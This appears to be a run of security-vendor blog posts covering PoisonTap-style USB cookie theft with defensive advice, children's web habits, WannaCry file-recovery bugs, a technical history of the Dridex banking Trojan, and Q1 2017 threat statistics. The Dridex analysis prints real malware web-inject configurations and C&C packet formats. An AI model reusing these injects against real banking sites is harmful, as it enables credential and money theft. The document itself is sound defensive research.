If the computer is not locked and the user opens the browser, Java Script initiates the redirecting of web requests to a malicious local web page. Then the browser opens the websites from the previously defined list. It is indeed quite spectacular:

If the user does nothing, Raspberry Pi Zero launches the default browser with URL in the address line after a short timeout. Then the process goes ahead as described. However, if the default browser has no cookies in the browser history, the attackers gain nothing.

Among the sites we’ve seen in the list supplied with the script were,,,,,, and over 100 other web addresses. This is what the log of stolen cookies looks like:

We checked the validity of stolen cookies using the website as an example by pasting the info into a clean browser field on other machines and were able to get hold of the user’s account along with all the statistics. On another website belonging to a railroad company vending service, we were able to retrieve the user’s token and take over the user’s account on another computer, because authentication protocol used only one LtpaToken2 for session identification.

Now this is more serious, because in this case the criminals can get information about previous orders made by the victim, part of their passport number, name, date of birth, email and phone number.

One of the strong points of this attack is that enthusiasts have learned how to automatically install the network device driver on all systems found in today’s corporate environments: Windows 7/8/10, Mac OS X. However, this scenario doesn’t work against a locked system – at least, for now. But we don’t think you should become too complacent; we assume it’s only a matter of time before the enthusiasts overcome this as well. Especially given that the number of these enthusiasts is growing every day.

Also, the malicious web page is blocked by all Kaspersky Lab products, which detect it as Trojan.JS.Poisontap.a. We also assume that this malicious web page will be blocked by the products of all other major anti-malware vendors.


There is already a wide array of single-board microcomputers: from the cheap and universal Raspberry Pi Zero to computing sticks specifically tuned for penetration testing, which cannot be visually differentiated from USB flash drives. To answer the main question of just how serious this threat is, we can say that at the moment it is overrated. However, we don’t advise underestimating the capabilities of IoT enthusiasts and it’s better to assume that those obstacles which we discovered in our experiment, have already been overcome.

Right now we can say that Windows PCs are the systems most prone to attacks aimed at intercepting the authentication name and password with a USB-connected Raspberry Pi. The attack works even if the user doesn’t have local or system administrator privileges, and can retrieve the domain credentials of other users, including those with administrator privileges. And it works against Mac OS systems, too.

The second type of attack that steals cookies only works (so far) when the system is unlocked, which reduces the chances of success. It also redirects traffic to a malicious page, which is easily blocked by a security solution. And, of course, stolen cookies are only useful on those websites that don’t employ a strict HTTP transport policy.


However, there are a number of recommendations we’d like to give you to avoid becoming easy prey for attackers.


1. Never leave your system unlocked, especially when you need to leave your computer for a moment and you are in a public place.

2. On returning to your computer, check to see if there are any extra USB devices sticking out of your ports. See a flash drive, or something that looks like a flash drive? If you didn’t stick it in, we suggest you remove it immediately.

3. Are you being asked to share something via external flash drive? Again, it’s better to make sure that it’s actually a flash drive. Even better – send the file via cloud or email.

4. Make a habit of ending sessions on sites that require authentication. Usually, this means clicking on a “Log out” button.

5. Change passwords regularly – both on your PC and the websites you use frequently. Remember that not all of your favorite websites may use mechanisms to protect against cookie data substitution. You can use specialized password management software for easy management of strong and secure passwords, such as the free Kaspersky Password Manager.

6. Enable two-factor authentication, for example, by requesting login confirmation or with a hardware token.

7. Of course, it’s strongly recommended to install and regularly update a security solution from a proven and trusted vendor.


1. If the network topology allows it, we suggest using solely Kerberos protocol for authenticating domain users. If, however, there is a demand for supporting legacy systems with LLNMR and NTLM authentication, we recommend breaking down the network into segments, so that even if one segment is compromised, attackers cannot access the whole network.

2. Restrict privileged domain users from logging in to the legacy systems, especially domain administrators.

3. Domain user passwords should be changed regularly. If, for whatever reason, the organization’s policy does not involve regular password changes, please change the policy. Like, yesterday.

4. All of the computers within a corporate network have to be protected with security solutions and regular updates should be ensured.

5. In order to prevent the connection of unauthorized USB devices, it can be useful to activate a Device Control feature, available in the Kaspersky Endpoint Security for Business suite.

6. If you own the web resource, we recommend activating the HSTS (HTTP strict transport security) which prevents switching from HTTPS to HTTP protocol and spoofing the credentials from a stolen cookie.

7. If possible, disable the listening mode and activate the Client (AP) isolation setting in Wi-Fi routers and switches, disabling them from listening to other workstations’ traffic.

8. Activate the DHCP Snooping setting to protect corporate network users from capturing their DHCP requests by fake DHCP servers.

Last, but not least, you never know if your credentials have been leaked from a site you’ve been to before – online or physical. Thus, we strongly recommend that you check your credentials on the HaveIbeenPwned website to be sure.

What Interests Children Online

Thu, 06/01/2017 - 07:02

Today’s children and teenagers are integrated into cyberspace so tightly that discussions on the outright prohibition of using devices with Internet connectivity are nonsensical. It is more reasonable to teach children how to behave themselves correctly online and lend support by protecting them against undesirable content. To solve these problems, many parents use dedicated software to protect their children online. The software not only restricts access to undesirable websites but also warns about any danger that the parents want to know about (for example, what their child is searching for on the Internet or to whom he or she is talking) and offers recommendations on what to do in each specific situation.

The Kaspersky Lab software line includes a Parental Control module, which is responsible for the safety of children online and is available as part of security products or as a stand-alone solution called Kaspersky Safe Kids. In order to recognize relevant threats, the products collect anonymous statistics about potentially dangerous content that a child encounters. As part of this report, we analyze the collected data in our quest for the answer to the question of what interests the current generation of children online.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that a child attempts to visit. If a website falls within one of the fourteen undesired categories, the module sends a notification in the Kaspersky Security Network (no personal user data are sent, and privacy is not violated). There are two important points that should be noted:

  • Each parent chooses the content categories that he or she wishes to ban and appropriately configures the security solution. However, anonymous statistics will be collected for all fourteen categories.
  • The data were collected only from computers running a Windows OS or a Mac OS, and statistics for mobile devices are not included in this report.

Currently, web filtering in the products that have the Parental Control feature is performed for the categories listed below:

  • Internet communication media (social networks, messengers, chats, and forums)
  • Adult content
  • Alcohol, tobacco, narcotics
  • Violence
  • Weapons, explosives, pyrotechnics
  • Profanity
  • Gambling, lotteries, sweepstakes
  • Computer games
  • Electronic commerce
  • Software, audio, video
  • HTTP query redirection
  • Recruitment
  • Religions, religious associations
  • News media

Out of the entire list, we have chosen the seven most popular categories, according to our statistical data. The remaining categories make up an insignificant number of triggered events (amounting to 0.84% worldwide). Therefore, we won’t be focusing on them today.

The world map

First of all, we will review which categories are the most popular among children across the globe (by the percentage of users visiting websites in the relevant category out of the total number of global users of the Parental Control module and the Safe Kids product).

The Percentage Breakdown of Notifications from the Parental Control Module and the Safe Kids Product for 14 Categories, May 2016–May 2017

This breakdown of category popularity shows that communication via social networks, messengers, and chats is still the main pastime of children when they are online. It might come as a shock that children have been increasingly interested in the “Alcohol, tobacco, narcotics” category (14.13% against 9.12% in last year’s report), which pushed “Computer games” to third place. The “Software, audio, video” category (6.23%) switched places with the “Electronic commerce” category (4.45%), yielding fourth place.

These data reflect the map of the world at large. Regionally, the situation may vary; and it does indeed vary. Let us review at length what interests children around the world and try to figure out what may be the cause of these interests.

Regional differences

For the study, we have selected six categories out of the list of the most popular ones. We decided not to take into account the “Profanity” category, as this content may be encountered on any website and it does not represent a separate interest for a child.

We have selected the following seven regions for comparison (the languages of all of the countries listed below are supported by the Kaspersky Lab’s child safety software):

  • North America (USA and Canada);
  • Western Europe (Austria, Belgium, Great Britain, Ireland, Germany, Liechtenstein, Luxembourg, Monaco, France, Switzerland, Denmark, Sweden, Spain, and Italy);
  • The CIS (Russia, Belarus, and Kazakhstan);
  • Latin America (Argentina, Brazil, Haiti, Guatemala, Honduras, the Dominican Republic, Colombia, Mexico, Panama, Uruguay, Chile, Ecuador, Puerto Rico, and Venezuela);
  • Asia (China, Singapore, Hong Kong, Macao, Taiwan, Japan, and Korea);
  • The Arab world (Algeria, Bahrain, Djibouti, Egypt, Iran, Iraq, Jordan, Kuwait, Libya, Sudan, Tunisia, the UAE, Yemen, and Saudi Arabia);
  • Oceania (Australia and New Zealand).

Here is the breakdown of interests by region.

The Results for the Top 6 Website Categories in Various Regions, May 2016–May 2017

In Western Europe, Northern America, and Oceania, children visit social networks and communicate via messengers almost as often as they navigate to websites with content devoted to tobacco, alcohol, and drugs. In the Arab countries, children visit social networks from their computers more often than other children in the world. In Asia, children show more interest in pornographic websites and online purchases than other children in the world.

The interest of children from the CIS countries and Latin America are very similar: online communication is prevalent, but its percentage is a bit lower in the CIS countries. Alcohol and tobacco follow far behind social networks and takes second place in the preferential rating for these regions. Computer games took third place.

Let’s see what causes this situation by individually reviewing each of the six categories.

Differences by country

In order to understand how such a breakdown of interests forms in children of different regions, we have taken several countries from each part of the world and reviewed them in detail for each of the six popular categories. Just as in the comparative charts above, we took the percentage of users who visited websites within a specific category out of the total number of users of the Parental Control module and the Safe Kids product.

Let’s start with the “Internet communication media” category, which holds first place in the rankings.

Internet communication media

Starting from last year, there has been a noticeable declining trend in popularity of using social networks from a computer. For example, the number of instances of visiting social-network pages has decreased by more than 10% in Great Britain and nearly by 15% in the USA. We have already explained that using social networks is more convenient with smartphones, as this allows a person to be online 24/7.

The Popularity of the “Internet Communication Media” Category in Various Countries, May 2016–May 2017

Yet, in some countries where the mobile Internet is not so well-developed or where parents are holding off on buying a smartphone for their child for various reasons, the communication platform is still a personal computer.

We can see that the lowest percentage of visits to social networks from a personal computer can be seen in Great Britain (20.57%), China (26.11%), the USA (27.68%), and Germany (28.49%). The highest percentage is in Egypt (88.12%), followed by Saudi Arabia (82.99%) and Mexico (77.70%), where children still prefer to communicate via a computer.

The most popular social networks among children in different regions are Facebook, Twitter, Pinterest, Google+, and, curiously enough, Instagram, even though it is fully focused on mobile devices, as the service does not support the ability to publish pictures from a computer (only with the help of third-party websites and applications).

The Percentage Breakdown of Global Social Network Popularity in Different Regions, May 2016–May 2017 (the percentage of the total number of users of five social networks)

Nearly every region shows a preferential bias towards Facebook out of all of the globally popular social networks. There are countries where regional social networks are more popular. For example, Sina Weibo, a Chinese microblog service, and Kaixin001, a social network, are much more popular than their western competitors.

The Percentage Breakdown of Popularity of Social Networks in China, May 2016–May 2017 (compared to the five popular social networks that were chosen)

However, in Japan, even with the existence of its own large and popular social network Mixi, children who have Kaspersky Lab’s Parental Control installed show preference in using Twitter and Facebook.

The Percentage Breakdown of Popularity of Social Networks in Japan, May 2016–May 2017 (compared to the five popular social networks that were chosen)

In Russia, children generally use domestic social networks, such as Vkontakte and Odnoklassniki.

The Percentage Breakdown of Popularity of Social Networks in Russia, May 2016–May 2017 (compared to the five popular social networks that were chosen)

Social networks and messengers are very convenient means of communicating, meeting new people, and exchanging information. Many social networks are not limited to these functions and also have functions for listening to music, watching videos, and even buying or selling items. At the same time, almost all of the content that is published on social networks is created by users themselves. There are threats and dangers associated with that, and they may affect children who are unprepared for this harsh social environment.

There are two types of threats on a social network: content-related and social. Content threats are various posts and communities that contain, for example, pornography, depictions of violence, information about drugs, etc. Social threats may include such phenomena as cyberbullying, trolling, sexting and sextortion, and psychological manipulation by sectarians whose purpose is to fill their ranks at the expense of the trustfulness of children. Swindlers who hunt for financial profit and use children to steal money from their parents should be included too.

All of the dangers can be avoided if parents monitor what their child is interested in and to whom he or she is talking not only in everyday life but on social networks as well. Parents should explain to their child the rules of conduct, which are relevant not only for public places but for digital social environments as well, since they too are, after all, public places. Leading developers of tools for protecting children on the Internet endeavor to make the social-network environment more transparent to parents, and we are no exception.

Alcohol, tobacco, narcotics

The next category that we are going to review is one that has been gaining popularity among children: “Alcohol, tobacco, narcotics”.

The Popularity of the “Alcohol, Tobacco, Narcotics” Category in Various Countries, May 2016–May 2017

First place among all countries where the category is most popular is taken by the UK (37.56%), followed by Canada (34.32%) and the USA (31.92%). We suppose that the high popularity may be connected to children frequently being exposed to scenes of smoking or drinking, for example, in films, and aspire to gain additional knowledge about the topic online. The situation is the same with drugs, especially with marijuana being legalized in some U.S. states.

Last year, we noticed a trend of frequent events triggered for this dangerous topic and explained it as the topic of alcohol, tobacco, and drugs being a part of teenage culture owing to coverage in blogs, films, and music. Also, last year, an “alternative” to smoking became extremely popular among teenagers. This is so-called “vaping”, which utilizes electronic devices to inhale vapor with different flavors.

To this day, this alternative’s level of harmfulness on the human body has not been studied fully yet. So, we decided not to disregard it in the “Alcohol, tobacco, narcotics” category. As a result, the category was expanded by the inclusion of “vaping”; and the overall number of triggered events has been increased, which is reflected in the statistics.

Computer games

Games are an integral part of everyone’s childhood. It’s not just children who are interested – many adults enjoy computer games too. With total immersion in a game, a person not only devotes himself or herself to the gaming process but also takes an interest in various mods, codes, and walkthroughs online.

The Popularity of the “Computer Games” Category in Various Countries, May 2016–May 2017

Children in Great Britain (26.43%), Canada (24.95%), Australia (19.60%), and the USA (19.11%) are the ones most interested in computer games. In Egypt (1.66%), Saudi Arabia (3.59%), and Italy (4.97%), children prefer social networks to gaming on the computer.

To get the full picture of what gaming websites children are interested in globally, we have taken the most popular gaming websites (according to data from our users) and checked which ones are popular in which region.

The Percentage Breakdown of Gaming Website Popularity in Different Regions, May 2016–May 2017

It turned out that children in all of the regions except for the CIS and Asian countries frequent the Roblox website more often than other children. Roblox is a massively multiplayer online role-playing game (MMORPG). Uncontrolled passion for these games may lead to fatigue, difficulty in socialization, and psychological problems. However, there are diverse MMORPGs, and Roblox, as well as the well-known game, Minecraft, may be beneficial for the creative thinking and imagination of a child. Nevertheless, no matter how great game is at educating a person, a parent should manage the time that his or her child spends on games to prevent addiction.

In the CIS and Asian countries, the most visited website related to computer games turned out to be Steam, which is a large online store, a gaming community, and also a personal computer client. The client has functions that enable the user to download and launch games, write reviews, trade game cards, etc. The statistics do not include gamer interaction with the Steam client, so one may assume that the real popularity of Steam is higher. But the problem is that a child can use Steam to play any other games, including those that are unsuitable for children. On the other hand, we have high hopes for the popularity of Roblox and Minecraft. The latter, by the way, is used in the school systems of several countries.

Software, audio, video

This category includes websites that allow users to listen to music, watch films online, and watch videos on YouTube. The category also includes websites that store various applications, torrents, and much more.

The Popularity of the “Software, Audio, Video” Category in Various Countries, May 2016–May 2017

Children from China spend much more time watching videos and listening to music. In China, the most visited website from this category is (a service for listening to music online).

YouTube, just like last year, is the most visited website in the world from this category. In Western countries, Netflix is very popular (it is a movie and TV-show provider). In the CIS countries, popularity is still there for websites that allow users to watch films and cartoons online for free, which is a gray area of legality, and torrent trackers, which are not always safe, as it is possible to download malicious applications along with a film or pirated game.

As for websites like YouTube, we should not assume that these are absolutely safe for children.

Electronic commerce

Each year, there is an increasing number of traditional shops opening their online offices; there are also many stores that exist only online. What could be easier than choosing an item you want and paying for it with a couple of clicks without even having to get up from the couch? Children from many countries think the same way.

The Popularity of the “Electronic Commerce” Category in Various Countries, May 2016–May 2017

Children from China (15.44%) and Japan (13.93%) are interested in online purchases more often than their peers from other countries. Their favorite websites are,, and the Japanese eBay is very popular among the children from Europe and the USA. All of the aforementioned websites are Internet markets where it is possible to buy virtually anything.

We certainly recommend that parents monitor the activity of their accounts in online stores and log out of them after completing purchases. The point is that many online stores have a feature to save bank card data in the account section so that a user does not have to reenter them. Thus, anyone who logs into an online store by using an account with saved bank card data can pay for any order with two clicks without having any information about the card. To prevent this from happening, a parent should always either log out of the online-store account and not save the password in the browser, or delete (or not confirm saving) bank card data after each purchase. Generally, it is recommended to have two different accounts in an operating system so that a parent’s data (passwords to websites, web-browser history, or bank card data) do not get into the hands of their child.

Adult content

To conclude our report, we are going to review the “Adult content” category. On the whole, the task of protecting children from adult topics, for instance, from the topic of sex, has never lost its relevance. With the appearance of the Internet, a variety of erotic and pornographic content became more accessible than ever before; children understand this. However, it is hard to imagine a child spending all day long browsing pornographic websites. Thus, the resulting percentage of the “Adult content” category is not so high.

The Popularity of the “Adult Content” Category in Various Countries, May 2016–May 2017

According to our data, adult content has been becoming less popular among children. But, as we warned in an analytical article last year, we should not assume that children have started visiting pornographic websites less often. It might be possible that they are doing it more frequently from mobile devices.

In China (8.82%) and Japan (5.66%), children show a substantially higher interest in adult content compared to other countries and regions. This might be due to erotic and pornographic comics and cartoons being extremely popular in Asia. For example, there are large stores in Japan that sell relevant products. Children from Saudi Arabia (0.23%) and the Emirates (0.16%) are the least interested in pornography. This might be because of the stringent cultural traditions of the Arab community.


Our statistics show that websites visited from a personal computer by a child depend upon the development of the regional Internet infrastructure at the place of residence, the financial abilities of the parents, and cultural peculiarities.

This is not the first year where there is a tendency for growth in the popularity of smartphones and tablets. Today, almost every child who has access to a tablet or a smartphone from an early age can handle it better than a personal computer. This indicates that both developers of applications that protect children online and parents themselves should not fall behind on the technological development of their children.

However, parents should not rely on technical means alone: they should not only manage how long their child spends online but work on developing digital literacy for themselves and their child. Parents should also build trust-based relationships with their child. After all, if he or she is scolded for being on social networks, then the child will be too afraid to turn to his or her parents for help if a dangerous situation occurs and the child will be left alone with his or her problem.

WannaCry mistakes that can help you restore files after infection

Thu, 06/01/2017 - 03:00

Sometimes ransomware developers make mistakes in their code. These mistakes could help victims regain access to their original files after a ransomware infection. This article is a short description of several errors, which were made by the WannaCry ransomware developers.

Errors in file removal logic

When Wannacry encrypts its victim’s files, it reads from the original file, encrypts the content and saves it into the file with extension “.WNCRYT”. After encryption it moves “.WNCRYT” into “.WNCRY” and deletes the original file. This deletion logic may vary depending on the location and properties of the victim’s files.

The files are located on the system drive:
  • If the file is in an ‘important’ folder (from the malware developers’ point of view – e.g. Desktop and Documents), then the original file will be overwritten with random data before removal. In this case, unfortunately, there is no way to restore the original file content.
  • If the file is stored outside of ‘important’ folders, then the original file will be moved to %TEMP%\%d.WNCRYT (where %d denotes a numeric value). These files contain the original data and are not overwritten, they are simply deleted from the disk, which means there is a high chance it will be possible to restore them using data recovery software.
  • Renamed original files that can be restored from %TEMP%

The files are located on other (non-system) drives:
  • Ransomware creates the “$RECYCLE” folder and sets hidden+system attributes to this folder. This makes this folder invisible in Windows File Explorer if it has a default configuration. The malware intends to move the original files into this directory after encryption.
  • The procedure that determines the temporary directory to store original files before removal

  • However, because of synchronization errors in the ransomware code in many cases the original files stay in the same directory and are not moved into $RECYCLE.
  • The original files are deleted in an unsecure way. This fact makes it possible to restore the deleted files using data recovery software.

Original files that can be restored the from a non-system drive

The procedure that constructs the temporary path for an original file

The piece of code calling the above procedures

Read-only files processing error

While analysing WannaCry, we also discovered that this ransomware has a bug in its read-only file processing. If there are such files on the infected machine, then the ransomware won’t encrypt them at all. It will only create an encrypted copy of each original file, while the original files themselves only get the “hidden” attribute. When this happens, it is simple to find them and restore their normal attributes.

Original read-only files are not encrypted and stay in the same place


From our in depth research into this ransomware, it is clear that the ransomware developers have made a lot of mistakes and, as we pointed out, the code quality is very low.

If you were infected with WannaCry ransomware there is a good possibility that you will be able to restore a lot of the files on the affected computer. To restore files, you can use the free utilities available for file recovery. We advise organizations share this article with their system administrators – as they can use the file recovery utilities on affected machines in their network.

Dridex: A History of Evolution

Thu, 05/25/2017 - 09:56

The Dridex banking Trojan, which has become a major financial cyberthreat in the past years (in 2015, the damage done by the Trojan was estimated at over $40 million), stands apart from other malware because it has continually evolved and become more sophisticated since it made its first appearance in 2011. Dridex has been able to escape justice for so long by hiding its main command-and-control (C&C) servers behind proxying layers. Given that old versions stop working when new ones appear and that each new improvement is one more step forward in the systematic development of the malware, it can be concluded that the same people have been involved in the Trojan’s development this entire time. Below we provide a brief overview of the Trojan’s evolution over six years, as well as some technical details on its latest versions.

How It All Began

Dridex made its first appearance as an independent malicious program (under the name “Cridex”) around September 2011. An analysis of a Cridex sample (MD5: 78cc821b5acfc017c855bc7060479f84) demonstrated that, even in its early days, the malware could receive dynamic configuration files, use web injections to steal money, and was able to infect USB media. This ability influenced the name under which the “zero” version of Cridex was detected — Worm.Win32.Cridex.

That version had a binary configuration file:

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak).

Cridex 0.77–0.80

In 2012, a significantly modified Cridex variant (MD5: 45ceacdc333a6a49ef23ad87196f375f) was released. The cybercriminals had dropped functionality related to infecting USB media and replaced the binary format of the configuration file and packets with XML. Requests sent by the malware to the C&C server looked as follows:

<message set_hash="" req_set="1" req_upd="1"> <header> <unique>WIN-1DUOM1MNS4F_A47E8EE5C9037AFE</unique> <version>600</version> <system>221440</system> <network>10</network> </header> <data></data> </message>

The <message> tag was the XML root element. The <header> tag contained information about the system, bot identifier, and the version of the bot.

Here is a sample configuration file:

<packet><commands><cmd id="1354" type="3"><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[https://.*?\.usbank\.com/]]></url></conditions><actions><modify><pattern><![CDATA[<body.*?>(.*?)]]></pattern><replacement><![CDATA[<link href="" rel="stylesheet" type="text/css"/> <style type="text/css"> .ui-dialog-titlebar{ background: white } .text1a{font-family: Arial; font-size: 10px;}

With the exception of the root element <packet>, the Dridex 0.8 configuration file remained virtually unchanged until version 3.0.

Dridex 1.10

The “zero” version was maintained until June 2014. A major operation (Operation Tovar) to take down another widespread malicious program — Gameover Zeus — was carried out that month. Nearly as soon as Zeus was taken down, the “zero” version of Cridex stopped working and Dridex version 1.100 appeared almost exactly one month afterward (on June 22).

Sample configuration file:

<root> <settings hash="65762ae2bf50e54757163e60efacbe144de96aca"> <httpshots> <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url> <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url> </httpshots> <formgrabber> <url type="deny">\.(swf)($|\?)</url><url type="deny">/isapi/ocget.dll</url> <url type="allow">^https?://*/login/</url> <url type="allow">^https?://</url> <url type="allow">^https?://</url> ... <redirects> <redirect name="1st" vnc="0" socks="0" uri="" timeout="20">twister5.js</redirect> <redirect name="2nd" vnc="1" socks="1" uri="" timeout="20">mainsc5.js</redirect> <redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="" timeout="20">/logs/dtukvbv/js.php</redirect> <redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="" timeout="20">/logs/dtukvbv/in.php</redirect> </redirects> <httpinjects> <httpinject><conditions> <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url> <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url> </conditions> <actions> <modify><pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern><replacement><![CDATA[onKeyDown=""]]></replacement></modify> <modify><pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type="text/css"> body {visibility: hidden; } </style> ...

This sample already has redirects for injected .js scripts that are characteristic of Dridex.

Here is a comparison between Dridex and Gameover Zeus injections:

Thus, the takedown of one popular botnet (Gameover Zeus) led to a breakthrough in the development of another, which had many strong resemblances to its predecessor.

We mentioned above that Dridex had begun to use PCRE, while its previous versions used SLRE. Remarkably, the only other banking malware that also used SLRE was Trojan-Banker.Win32.Shifu. That Trojan was discovered in August 2015 and was distributed through spam via the same botnets as Dridex. Additionally, both banking Trojans used XML configuration files.

We also have reasons to believe that, at least in 2014, the cybercriminals behind Dridex were Russian speakers. This is supported by comments in the command & control server’s source code:

And by the database dumps:

Dridex: from Version 2 to Version 3

By early 2015, Dridex implemented a kind of P2P network, which is also reminiscent of the Gameover Zeus Trojan. On that network, some peers (supernodes) had access to the C&C and forwarded requests from other network nodes to it. The configuration file was still stored in XML format, but it got a new section, <nodes>, which contained an up-to-date peer list. Additionally, the protocol used for communication with the C&C was encrypted.

Dridex: from Version 3 to Version 4

One of the administrators of the Dridex network was arrested on August 28, 2015. In the early days of September, networks with identifiers 120, 200, and 220 went offline. However, they came back online in October and new networks were added: 121, 122, 123, 301, 302, and 303.

Notably, the cybercriminals stepped up security measures at that time. Specifically, they introduced geo-filtering wherein an IP field appeared in C&C request packets, which was then used to identify the peer’s country. If it was not on the list of target countries, the peer received an error message.

In 2016, the loader became more complicated and encryption methods were changed. A binary loader protocol was introduced, along with a <settings> section, which contained the configuration file in binary format.

Dridex 4.x. Back to the Future

The fourth version of Dridex was detected in early 2017. It has capabilities similar to the third version, but the cybercriminals stopped using the XML format in the configuration file and packets and went back to binary. The analysis of new samples is rendered significantly more difficult by the fact that the loader now works for two days, at most. This is similar to Lurk, except that Lurk’s loader was only active for a couple of hours.

Analyzing the Loader’s Packets

The packet structure in the fourth version is similar to those in the late modifications of the loader’s 3.x versions. However, the names of the modules requested have been replaced with hashes:

Here is the function that implements C&C communication and uses these hashes:

Knowing the packet structure in the previous version, one can guess which hash relates to which module by comparing packets from the third and fourth versions.

In the fourth version of Dridex, there are many places where the CRC32 hashing algorithm is used, including hashes used to search for function APIs and to check packet integrity. It would make sense for hashes used in packets to be none other than CRC32 of requested module names. This assumption can easily be verified by running the following Python code:

That’s right – the hashes obtained this way are the same as those in the program’s code.

With regards to encryption of the loader’s packets, nothing has changed. As in Dridex version 3, the RC4 algorithm is used, with a key stored in encrypted form in the malicious program’s body.

One more change introduced in the fourth version is that a much stricter loader authorization protocol is now used. A loader’s lifespan has been reduced to one day, after which encryption keys are changed and old loaders become useless. The server responds to requests from all outdated samples with error 404.

Analysis of the Bot’s Protocol and Encryption

Essentially, the communication of Dridex version 4 with its C&C is based on the same procedure as before, with peers still acting as proxy servers and exchanging modules. However, encryption and packet structure have changed significantly; now a packet looks like the <settings> section from the previous Dridex version. No more XML.

The Basic Packet Generation function is used to create packets for communication with the C&C and with peers. There are two types of packets for the C&C:

  1. Registration and transfer of the generated public key
  2. Request for a configuration file

The function outputs the following packet:

A packet begins with the length of the RC4 key (74h) that will be used to encrypt strings in that packet. This is followed by two parts of the key that are the same size. The actual key is calculated by performing XOR on these blocks. Next comes the packet type (00h) and encrypted bot identifier.

Peer-to-Peer Encryption

Sample encrypted P2P packet:

The header of a P2P packet is a DWORD array, the sum of all elements in which is zero. The obfuscated data size is the same as in the previous version, but the data is encrypted differently:

The packet begins with a 16-byte key, followed by 4 bytes of information about the size of data encrypted with the previous key using RC4. Next comes a 16-byte key and data that has been encrypted with that key using RC4. After decryption we get a packet compressed with gzip.

Peer to C&C Encryption

As before, the malware uses a combination of RSA, RC4 encryption, and HTTPS to communicate with the C&C. In this case, peers work as proxy servers. An encrypted packet has the following structure: 4-byte CRC, followed by RSA_BLOB. After decrypting RSA (request packets cannot be decrypted without the C&C private key), we get a GZIP packet.

Configuration File

We have managed to obtain and decrypt the configuration file of botnet 222:

It is very similar in structure to the <settings> section from the previous version of Dridex. It begins with a 4-byte hash, which is followed by the configuration file’s sections.

struct DridexConfigSection { BYTE SectionType; DWORD DataSize; BYTE Data[DataSize]; };

The sections are of the same types as in <settings>:

  • 01h – HttpShots
  • 02h – Formgrabber
  • 08h – Redirects
  • etc.

The only thing that has changed is the encryption of strings in the configuration file – RC4 is now used.

struct EncryptedConfigString{ BYTE RC4Key1[16]; // Size's encryption key DWORD EncryptedSize; BYTE RC4Key2[16]; // Data's encryption key BYTE EncryptedData[Size]; };

RC4 was also used to encrypt data in p2p packets.

Geographical Distribution

The developers of Dridex look for potential victims in Europe. Between January 1st and early April 2017, we detected Dridex activity in several European countries. The UK accounted for more than half (nearly 60%) of all detections, followed by Germany and France. At the same time, the malware never works in Russia, as the C&Cs detect the country via IP address and do not respond if the country is Russia.


In the several years that the Dridex family has existed, there have been numerous unsuccessful attempts to block the botnet’s activity. The ongoing evolution of the malware demonstrates that the cybercriminals are not about to bid farewell to their brainchild, which is providing them with a steady revenue stream. For example, Dridex developers continue to implement new techniques for evading the User Account Control (UAC) system. These techniques enable the malware to run its malicious components on Windows systems.

It can be surmised that the same people, possibly Russian speakers, are behind the Dridex and Zeus Gameover Trojans, but we do not know this for a fact. The damage done by the cybercriminals is also impossible to assess accurately. Based on a very rough estimate, it has reached hundreds of millions of dollars by now. Furthermore, given the way that the malware is evolving, it can be assumed that a significant part of the “earnings” is reinvested into the banking Trojan’s development.

The analysis was performed based on the following samples:

Dridex4 loader: d0aa5b4dd8163eccf7c1cd84f5723d48
Dridex4 bot: ed8cdd9c6dd5a221f473ecf3a8f39933

IT threat evolution Q1 2017. Statistics

Mon, 05/22/2017 - 05:03

Q1 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

  • 1,333,605 malicious installation packages;
  • 32,038 mobile banker Trojans (installation packages);
  • 218,625 mobile ransomware Trojans (installation packages).
Mobile threats Q1 events The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.

Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, was downloaded.

The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

